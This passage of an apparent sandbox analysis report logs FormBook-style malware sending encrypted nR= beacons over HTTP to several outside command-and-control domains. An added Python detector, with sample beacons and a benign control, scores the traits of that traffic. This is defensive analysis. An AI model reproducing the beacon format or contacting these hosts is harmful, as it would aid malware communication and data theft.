                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.5 | 49718 | 154.23.184.240 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:18.921433926 CEST | 735 | OUT | POST /p39s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Referer: http://www.hm62t.top/p39s/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 65 41 61 35 4e 56 67 45 74 65 64 47 49 5a 33 46 51 33 53 47 6b 2f 45 41 41 69 55 50 4b 54 47 49 41 6f 34 30 50 4b 76 72 50 45 31 74 4c 4e 42 30 44 7a 31 4a 77 43 65 66 61 54 32 6a 32 53 46 5a 67 58 79 79 66 6a 63 65 78 78 47 45 4b 69 48 6d 78 62 39 64 34 5a 57 56 4c 45 6f 4a 42 4b 6e 4c 31 58 2b 35 4e 35 61 7a 54 50 53 64 72 54 72 78 70 79 58 57 61 73 4f 41 2b 2b 62 65 70 43 51 38 61 54 62 51 59 71 71 4a 2b 37 45 33 6c 65 34 55 41 65 58 67 44 71 49 42 61 56 53 68 73 4b 62 61 34 45 70 50 42 69 56 62 72 35 67 6e 76 65 64 76 48 62 48
                    Data Ascii: nR=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHeAa5NVgEtedGIZ3FQ3SGk/EAAiUPKTGIAo40PKvrPE1tLNB0Dz1JwCefaT2j2SFZgXyyfjcexxGEKiHmxb9d4ZWVLEoJBKnL1X+5N5azTPSdrTrxpyXWasOA++bepCQ8aTbQYqqJ+7E3le4UAeXgDqIBaVShsKba4EpPBiVbr5gnvedvHbH
                    Sep 12, 2024 13:03:19.821716070 CEST | 312 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:19 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.5 | 49720 | 154.23.184.240 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:21.465765953 CEST | 1752 | OUT | POST /p39s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Referer: http://www.hm62t.top/p39s/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 5a 7a 62 54 70 76 4c 54 4b 4b 62 68 32 53 44 62 44 53 57 79 43 66 71 4a 70 78 4b 73 4f 47 4c 66 72 51 30 4d 31 69 48 65 70 59 4e 6c 4a 69 76 67 44 69 66 4e 47 55 2b 50 54 6b 55 63 32 61 53 31 4a 4f 49 6f 6a 66 67 4e 65 4f 47 65 39 4e 57 43 6a 66 6e 57 6f 6b 6c 50 53 70 46 6d 6e 6d 6d 76 48 66 4a 53 54 34 54 6c 39 58 33 53 4e 53 46 38 30 59 72 68 53 47 7a 33 55 37 2b 35 32 54 79 57 38 33 31 47 5a 47 71 6d 39 74 77 79 6e 32 6a 34 46 7a 31 37 31 2f 31 6d 61 78 63 4c 79 30 72 4d 44 66 4b 44 5a 2b [TRUNCATED]
                    Data Ascii: nR=[TRUNCATED]
                    Sep 12, 2024 13:03:22.355307102 CEST | 312 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:22 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.5 | 49721 | 154.23.184.240 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:24.016140938 CEST | 456 | OUT | GET /p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:24.935090065 CEST | 312 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:24 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.5 | 49722 | 85.159.66.93 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:30.182279110 CEST | 748 | OUT | POST /k2vl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Origin: http://www.golbasi-nakliyat.xyz
                    Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 65 6c 6f 46 53 4d 61 56 2f 47 6e 32 48 4a 2b 75 6c 45 70 41 52 39 4e 61 78 32 4f 66 43 47 58 4f 6e 62 6d 6a 66 42 70 36 6e 37 6d 34 6a 79 79 4d 70 66 56 2f 63 71 37 48 76 2b 61 44 59 47 54 63 70 54 56 57 61 39 74 64 49 51 5a 59 76 46 63 30 79 55 69 33 4b 65 68 52 71 55 2f 34 7a 51 6e 55 43 35 76 4e 56 55 54 56 67 37 75 41 37 4d 33 45 54 56 56 43 74 42 6a 50 69 72 75 70 38 53 56 4c 6a 58 42 48 78 51 59 78 38 68 44 48 74 62 64 58 2b 35 5a 37 42 76 44 5a 53 64 32 38 44 59 31 62 41 32 70 54 33 2b 39 63 52 6d 33 57 78 6d 53 38 35 61 30 76 53 58 6d 4c 69 55 3d
                    Data Ascii: nR=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7BvDZSd28DY1bA2pT3+9cRm3WxmS85a0vSXmLiU=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.5 | 49723 | 85.159.66.93 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:32.717885971 CEST | 768 | OUT | POST /k2vl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Origin: http://www.golbasi-nakliyat.xyz
                    Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 69 58 4e 46 44 6d 69 65 42 70 35 6e 37 6d 71 44 79 33 52 35 66 65 2f 63 32 7a 48 76 79 61 44 59 53 54 63 6f 50 56 57 70 6c 71 64 59 51 62 51 50 46 4e 77 79 55 69 33 4b 65 68 52 71 51 47 34 7a 59 6e 55 7a 4a 76 50 33 77 55 4c 51 37 78 4a 62 4d 33 4f 7a 56 52 43 74 41 32 50 6d 72 55 70 36 57 56 4c 69 6e 42 48 67 51 62 2b 38 68 46 61 39 61 35 61 63 30 48 2b 77 33 34 52 78 49 7a 6c 78 63 75 58 57 62 44 4a 56 32 56 50 78 4b 50 47 69 75 6c 74 4a 37 64 31 78 48 57 56 31 41 67 6e 39 7a 77 42 41 75 4e 51 59 42 78 33 45 58 43 75 57 4d 58
                    Data Ascii: nR=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxiXNFDmieBp5n7mqDy3R5fe/c2zHvyaDYSTcoPVWplqdYQbQPFNwyUi3KehRqQG4zYnUzJvP3wULQ7xJbM3OzVRCtA2PmrUp6WVLinBHgQb+8hFa9a5ac0H+w34RxIzlxcuXWbDJV2VPxKPGiultJ7d1xHWV1Agn9zwBAuNQYBx3EXCuWMX


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.5 | 49724 | 85.159.66.93 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:35.282720089 CEST | 1785 | OUT | POST /k2vl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Origin: http://www.golbasi-nakliyat.xyz
                    Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 71 58 4e 77 58 6d 69 39 35 70 34 6e 37 6d 78 44 79 32 52 35 66 44 2f 63 75 33 48 76 4f 77 44 62 71 54 4f 61 72 56 42 4d 52 71 53 59 51 62 53 50 46 64 30 79 55 53 33 4b 4f 74 52 71 41 47 34 7a 59 6e 55 77 52 76 49 6c 55 55 4a 51 37 75 41 37 4d 42 45 54 56 31 43 74 6f 6d 50 6d 76 45 6f 4b 32 56 4c 43 33 42 55 69 34 62 7a 38 68 48 5a 39 61 68 61 63 34 6d 2b 77 62 46 52 79 55 4a 6c 7a 4d 75 55 53 79 2b 56 6b 71 66 63 43 43 5a 47 77 76 44 7a 76 50 34 33 48 65 69 66 6b 6b 69 6c 38 54 65 58 67 71 76 5a 62 30 6d 72 79 6a 53 68 54 56 61 57 2b 2b 4f 67 36 56 6b 44 56 33 66 65 59 32 6f 6d 72 73 54 49 54 45 6a 52 74 34 43 34 52 46 67 43 64 55 2b 6a 2f 2b 54 6b 31 79 43 61 38 62 47 2b 46 6c 74 51 4b 58 46 53 57 43 35 6b 55 38 42 4d 4d 67 65 76 43 77 6f 51 7a 32 77 67 41 70 76 76 6f 38 41 6b 41 49 38 7a 36 47 38 38 50 4b 4e 76 66 48 53 49 39 55 55 69 55 77 68 77 67 52 41 72 75 73 [TRUNCATED]
                    Data Ascii: nR=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 [TRUNCATED]


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.5 | 49725 | 85.159.66.93 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:37.832906961 CEST | 467 | OUT | GET /k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:38.543889999 CEST | 225 | IN | HTTP/1.1 404 Not Found
                    Server: nginx/1.14.1
                    Date: Thu, 12 Sep 2024 11:03:38 GMT
                    Content-Length: 0
                    Connection: close
                    X-Rate-Limit-Limit: 5s
                    X-Rate-Limit-Remaining: 19
                    X-Rate-Limit-Reset: 2024-09-12T11:03:43.4315597Z
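The sessions above show the same request shape against every candidate domain: a POST to a four-character directory with a form body of one base64-shaped `nR=` parameter, `Origin` and `Referer` pointing back at the same host, a fixed Android 4.4.2 / Chrome 44 User-Agent on a Windows host, `Connection: close`, followed by a GET carrying `nR=` and `OJ=` in the query string. The detector below, an added example that is not part of the Joe Sandbox report, parses requests in the form the report prints them and scores those traits; its sample input copies sessions 8, 9 and 12 (Accept*/Cache-Control headers dropped) plus one constructed benign request as a negative control. The trait names and thresholds are the example's own choices, not an official signature.

```python
"""FormBook-style HTTP C2 beacon detector.

Added example, not part of the Joe Sandbox report. SAMPLE_REQUESTS copies the beacon
requests of sessions 8, 9 and 12 above (Accept*/Cache-Control headers dropped); the
last entry is a constructed benign request used as a negative control.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

FORMBOOK_UA = ("Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")            # /p39s/, /k2vl/, /lwt6/, /ftr3/ in the capture
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")  # shape of the encrypted nR= payload

SAMPLE_REQUESTS = [
    ("GET /p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l"
     "142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp HTTP/1.1\n"
     "Host: www.hm62t.top\nConnection: close\nUser-Agent: " + FORMBOOK_UA + "\n"),
    ("POST /k2vl/ HTTP/1.1\nHost: www.golbasi-nakliyat.xyz\nOrigin: http://www.golbasi-nakliyat.xyz\n"
     "Referer: http://www.golbasi-nakliyat.xyz/k2vl/\nContent-Type: application/x-www-form-urlencoded\n"
     "Connection: close\nContent-Length: 203\nUser-Agent: " + FORMBOOK_UA + "\n\n"
     "nR=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZ"
     "YvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7BvDZSd28DY1bA2pT3+9"
     "cRm3WxmS85a0vSXmLiU=\n"),
    ("GET /k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqO"
     "MvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp HTTP/1.1\n"
     "Host: www.golbasi-nakliyat.xyz\nConnection: close\nUser-Agent: " + FORMBOOK_UA + "\n"),
    # constructed benign request: ordinary desktop UA, keep-alive, no nR= payload
    ("GET /index.html?q=hello HTTP/1.1\nHost: www.example.org\nConnection: keep-alive\n"
     "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0 Safari/537.36\n"),
]


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: Dict[str, str]   # header names lower-cased
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Split one HTTP/1.1 request, as printed in the report, into request line, headers, body."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body.strip())


def _params(qs: str) -> Dict[str, str]:
    """Split on '&' and the first '=' only, with no %-decoding, so the '+' and '/' characters
    of the base64 payload survive (urllib's parse_qs would turn '+' into a space)."""
    return dict(p.split("=", 1) for p in qs.split("&") if "=" in p)


def formbook_indicators(req: HttpRequest) -> List[str]:
    """Return the beacon traits (as seen in the capture above) present in one request."""
    url = urlsplit(req.target)
    host = req.headers.get("host", "")
    params = _params(url.query if req.method == "GET" else req.body)
    hits: List[str] = []
    if req.headers.get("user-agent") == FORMBOOK_UA:
        hits.append("fixed_android_ua")
    if PATH_RE.match(url.path):
        hits.append("four_char_path")
    if B64_RE.match(params.get("nR", "")):
        hits.append("nR_base64_payload")
    if req.method == "GET" and "OJ" in params:
        hits.append("OJ_get_marker")
    if req.method == "POST" and req.headers.get("origin") == f"http://{host}" \
            and req.headers.get("referer") == f"http://{host}{url.path}":
        hits.append("self_referencing_origin")
    if req.headers.get("connection") == "close":
        hits.append("connection_close")
    return hits


def is_formbook_beacon(req: HttpRequest) -> bool:
    """Require the fixed UA and the nR payload plus at least two supporting traits."""
    hits = formbook_indicators(req)
    return "fixed_android_ua" in hits and "nR_base64_payload" in hits and len(hits) >= 4


def beacon_sequence(raws: List[str]) -> Dict[str, List[Tuple[str, Optional[int]]]]:
    """Group beacons by Host, keeping (method, Content-Length) in capture order; the report
    shows POST 203 -> POST 223 -> POST 1239 -> GET against each candidate domain in turn."""
    seq: Dict[str, List[Tuple[str, Optional[int]]]] = {}
    for raw in raws:
        req = parse_request(raw)
        if is_formbook_beacon(req):
            length = req.headers.get("content-length")
            seq.setdefault(req.headers["host"], []).append((req.method, int(length) if length else None))
    return seq


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        r = parse_request(raw)
        print(r.method, r.headers.get("host"), is_formbook_beacon(r), formbook_indicators(r))
    print(beacon_sequence(SAMPLE_REQUESTS))
```

In practice the per-host grouping is the more useful output: a single `nR=` POST can be a false positive, but the same process walking a list of unrelated domains with the same path shape, the same three body sizes and the same User-Agent, and treating 404 and 301 responses as "try the next one", is the behaviour that distinguishes the beacon from a web form submission. Run the same logic over proxy logs or the exported HTTP objects of a capture rather than over sandbox output alone.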


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    13 | 192.168.2.5 | 49726 | 185.173.111.76 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:43.645375013 CEST | 742 | OUT | POST /lwt6/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Origin: http://www.mfgamecompany.shop
                    Referer: http://www.mfgamecompany.shop/lwt6/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4f 41 5a 7a 55 76 67 78 4f 57 53 34 52 79 55 31 48 59 6f 30 2f 48 52 50 31 38 52 39 34 68 45 6a 51 63 37 61 6c 46 7a 54 2b 72 51 35 49 62 6b 53 31 42 45 2f 36 76 6f 44 4f 61 46 44 33 32 6b 48 2f 56 37 53 2b 6c 37 46 57 34 30 34 6d 44 31 44 66 45 54 37 6b 63 44 66 4d 69 4f 42 51 35 50 4c 6e 4c 4c 52 36 39 67 4f 76 70 6d 76 77 53 75 66 68 71 62 35 6e 4c 7a 4b 75 6f 33 42 77 47 31 4d 64 6c 68 44 36 6a 61 55 62 50 35 77 5a 57 6b 54 47 4f 57 76 6b 31 64 76 4e 2f 67 52 2f 73 68 7a 64 36 54 69 61 58 35 48 77 39 57 4c 55 2b 43 30 41 4b 4b 5a 52 7a 5a 4f 51 6b 3d
                    Data Ascii: nR=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvk1dvN/gR/shzd6TiaX5Hw9WLU+C0AKKZRzZOQk=
                    Sep 12, 2024 13:03:44.312072992 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:44 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
